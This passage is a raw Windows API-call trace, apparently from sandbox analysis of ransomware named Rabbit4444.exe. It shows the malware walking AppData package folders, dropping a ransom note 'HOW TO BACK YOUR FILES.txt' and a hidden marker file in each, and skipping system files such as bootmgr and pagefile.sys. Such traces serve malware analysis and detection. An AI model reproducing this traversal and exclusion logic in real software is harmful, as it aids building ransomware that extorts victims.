lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0de4c4f, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0de4c4f, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0e0aee1, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0066.357] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.357] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0066.357] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0de4c4f, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0de4c4f, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0e0aee1, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0066.357] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0066.357] lstrcpyW (in: lpString1=0x130ec06, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0066.357] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetCookies\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.parentalcontrols_cw5n1h2txyewy\\ac\\inetcookies\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0066.358] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0066.358] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0066.358] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.358] CloseHandle (hObject=0x27c) returned 1 [0066.358] CloseHandle (hObject=0x228) returned 1 [0066.358] GetCurrentThreadId () returned 0xd98 [0066.358] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122008 [0066.358] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetCache" [0066.358] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108838 | out: hHeap=0xe0000) returned 1 [0066.358] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122000 | out: hHeap=0xe0000) returned 1 [0066.358] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetCache" [0066.358] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetCache\\" [0066.359] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" [0066.359] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.parentalcontrols_cw5n1h2txyewy\\ac\\inetcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0066.360] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0066.362] FlushFileBuffers (hFile=0x228) returned 1 [0066.363] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0066.363] CloseHandle (hObject=0x228) returned 1 [0066.364] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetCache") returned 100 [0066.364] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.364] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetCache\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x825856ce, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd0d927d2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf0e0aee1, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0066.364] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.364] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.364] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0066.364] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0066.364] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x825856ce, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd0d927d2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf0e0aee1, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.364] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.364] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.364] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0066.364] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0066.364] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0066.364] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0e0aee1, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0e0aee1, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0e0aee1, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0066.364] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.364] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0066.364] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0e0aee1, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0e0aee1, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0e0aee1, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0066.364] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0066.364] lstrcpyW (in: lpString1=0x130ec02, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0066.364] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.parentalcontrols_cw5n1h2txyewy\\ac\\inetcache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0066.365] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0066.365] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0066.365] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.365] CloseHandle (hObject=0x27c) returned 1 [0066.365] CloseHandle (hObject=0x228) returned 1 [0066.365] GetCurrentThreadId () returned 0xd98 [0066.365] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x11cd48 [0066.365] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy" [0066.366] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115f70 | out: hHeap=0xe0000) returned 1 [0066.366] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11cd40 | out: hHeap=0xe0000) returned 1 [0066.366] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy" [0066.366] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\" [0066.366] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\.BFC0E91B00AE8A0620D3" [0066.366] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.oobenetworkconnectionflow_cw5n1h2txyewy\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0066.369] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0066.372] FlushFileBuffers (hFile=0x228) returned 1 [0066.373] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0066.374] CloseHandle (hObject=0x228) returned 1 [0066.374] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy") returned 96 [0066.374] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.374] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x740ca625, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x74116aed, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf0e0aee1, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0066.374] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.374] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.374] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0066.374] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0066.374] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x740ca625, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x74116aed, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf0e0aee1, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.374] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.374] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.374] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0066.374] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0066.375] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0066.375] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0e0aee1, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0e0aee1, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0e31146, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0066.375] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.375] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0066.375] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x74116aed, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x74116aed, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x74116aed, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AC", cAlternateFileName="")) returned 1 [0066.375] lstrcmpiW (lpString1="AC", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.375] lstrcmpiW (lpString1="AC", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.375] lstrcmpiW (lpString1="AC", lpString2="Rabbit4444.exe") returned -1 [0066.375] lstrcmpiW (lpString1="AC", lpString2=".") returned 1 [0066.375] lstrcmpiW (lpString1="AC", lpString2="..") returned 1 [0066.375] lstrcmpiW (lpString1="AC", lpString2="windows") returned -1 [0066.375] lstrcmpiW (lpString1="AC", lpString2="bootmgr") returned -1 [0066.375] lstrcmpiW (lpString1="AC", lpString2="pagefile.sys") returned -1 [0066.375] lstrcmpiW (lpString1="AC", lpString2="boot") returned -1 [0066.375] lstrcmpiW (lpString1="AC", lpString2="ids.txt") returned -1 [0066.375] lstrcmpiW (lpString1="AC", lpString2="NTUSER.DAT") returned -1 [0066.375] lstrcpyW (in: lpString1=0x130ebfa, lpString2="AC" | out: lpString1="AC") returned="AC" [0066.375] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122320 [0066.375] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc8) returned 0x1166c0 [0066.375] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122328 | out: ListHead=0xf68b0, ListEntry=0x122328) returned 0x11cf48 [0066.375] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x740ca625, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x740ca625, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x740ca625, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0066.375] lstrcmpiW (lpString1="AppData", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.375] lstrcmpiW (lpString1="AppData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.375] lstrcmpiW (lpString1="AppData", lpString2="Rabbit4444.exe") returned -1 [0066.375] lstrcmpiW (lpString1="AppData", lpString2=".") returned 1 [0066.375] lstrcmpiW (lpString1="AppData", lpString2="..") returned 1 [0066.375] lstrcmpiW (lpString1="AppData", lpString2="windows") returned -1 [0066.375] lstrcmpiW (lpString1="AppData", lpString2="bootmgr") returned -1 [0066.375] lstrcmpiW (lpString1="AppData", lpString2="pagefile.sys") returned -1 [0066.375] lstrcmpiW (lpString1="AppData", lpString2="boot") returned -1 [0066.375] lstrcmpiW (lpString1="AppData", lpString2="ids.txt") returned -1 [0066.375] lstrcmpiW (lpString1="AppData", lpString2="NTUSER.DAT") returned -1 [0066.375] lstrcpyW (in: lpString1=0x130ebfa, lpString2="AppData" | out: lpString1="AppData") returned="AppData" [0066.375] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122300 [0066.376] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xd2) returned 0x11c068 [0066.376] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122308 | out: ListHead=0xf68b0, ListEntry=0x122308) returned 0x122328 [0066.376] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x740ca625, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x740ca625, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x740ca625, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0066.376] lstrcmpiW (lpString1="LocalCache", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0066.376] lstrcmpiW (lpString1="LocalCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.376] lstrcmpiW (lpString1="LocalCache", lpString2="Rabbit4444.exe") returned -1 [0066.376] lstrcmpiW (lpString1="LocalCache", lpString2=".") returned 1 [0066.376] lstrcmpiW (lpString1="LocalCache", lpString2="..") returned 1 [0066.376] lstrcmpiW (lpString1="LocalCache", lpString2="windows") returned -1 [0066.376] lstrcmpiW (lpString1="LocalCache", lpString2="bootmgr") returned 1 [0066.376] lstrcmpiW (lpString1="LocalCache", lpString2="pagefile.sys") returned -1 [0066.376] lstrcmpiW (lpString1="LocalCache", lpString2="boot") returned 1 [0066.376] lstrcmpiW (lpString1="LocalCache", lpString2="ids.txt") returned 1 [0066.376] lstrcmpiW (lpString1="LocalCache", lpString2="NTUSER.DAT") returned -1 [0066.376] lstrcpyW (in: lpString1=0x130ebfa, lpString2="LocalCache" | out: lpString1="LocalCache") returned="LocalCache" [0066.376] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122040 [0066.376] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xd8) returned 0x11bc08 [0066.376] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122048 | out: ListHead=0xf68b0, ListEntry=0x122048) returned 0x122308 [0066.376] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x740ca625, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x740ca625, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x740ca625, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0066.376] lstrcmpiW (lpString1="LocalState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0066.376] lstrcmpiW (lpString1="LocalState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.376] lstrcmpiW (lpString1="LocalState", lpString2="Rabbit4444.exe") returned -1 [0066.376] lstrcmpiW (lpString1="LocalState", lpString2=".") returned 1 [0066.376] lstrcmpiW (lpString1="LocalState", lpString2="..") returned 1 [0066.376] lstrcmpiW (lpString1="LocalState", lpString2="windows") returned -1 [0066.376] lstrcmpiW (lpString1="LocalState", lpString2="bootmgr") returned 1 [0066.376] lstrcmpiW (lpString1="LocalState", lpString2="pagefile.sys") returned -1 [0066.376] lstrcmpiW (lpString1="LocalState", lpString2="boot") returned 1 [0066.376] lstrcmpiW (lpString1="LocalState", lpString2="ids.txt") returned 1 [0066.376] lstrcmpiW (lpString1="LocalState", lpString2="NTUSER.DAT") returned -1 [0066.376] lstrcpyW (in: lpString1=0x130ebfa, lpString2="LocalState" | out: lpString1="LocalState") returned="LocalState" [0066.376] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1222e0 [0066.376] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xd8) returned 0x11b6c8 [0066.376] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1222e8 | out: ListHead=0xf68b0, ListEntry=0x1222e8) returned 0x122048 [0066.376] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x740ca625, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x740ca625, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x740ca625, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0066.377] lstrcmpiW (lpString1="RoamingState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0066.377] lstrcmpiW (lpString1="RoamingState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.377] lstrcmpiW (lpString1="RoamingState", lpString2="Rabbit4444.exe") returned 1 [0066.377] lstrcmpiW (lpString1="RoamingState", lpString2=".") returned 1 [0066.377] lstrcmpiW (lpString1="RoamingState", lpString2="..") returned 1 [0066.377] lstrcmpiW (lpString1="RoamingState", lpString2="windows") returned -1 [0066.377] lstrcmpiW (lpString1="RoamingState", lpString2="bootmgr") returned 1 [0066.377] lstrcmpiW (lpString1="RoamingState", lpString2="pagefile.sys") returned 1 [0066.377] lstrcmpiW (lpString1="RoamingState", lpString2="boot") returned 1 [0066.377] lstrcmpiW (lpString1="RoamingState", lpString2="ids.txt") returned 1 [0066.377] lstrcmpiW (lpString1="RoamingState", lpString2="NTUSER.DAT") returned 1 [0066.377] lstrcpyW (in: lpString1=0x130ebfa, lpString2="RoamingState" | out: lpString1="RoamingState") returned="RoamingState" [0066.377] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122160 [0066.377] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xdc) returned 0x125740 [0066.377] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122168 | out: ListHead=0xf68b0, ListEntry=0x122168) returned 0x1222e8 [0066.377] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x740ca625, ftCreationTime.dwHighDateTime=0x1d32744, 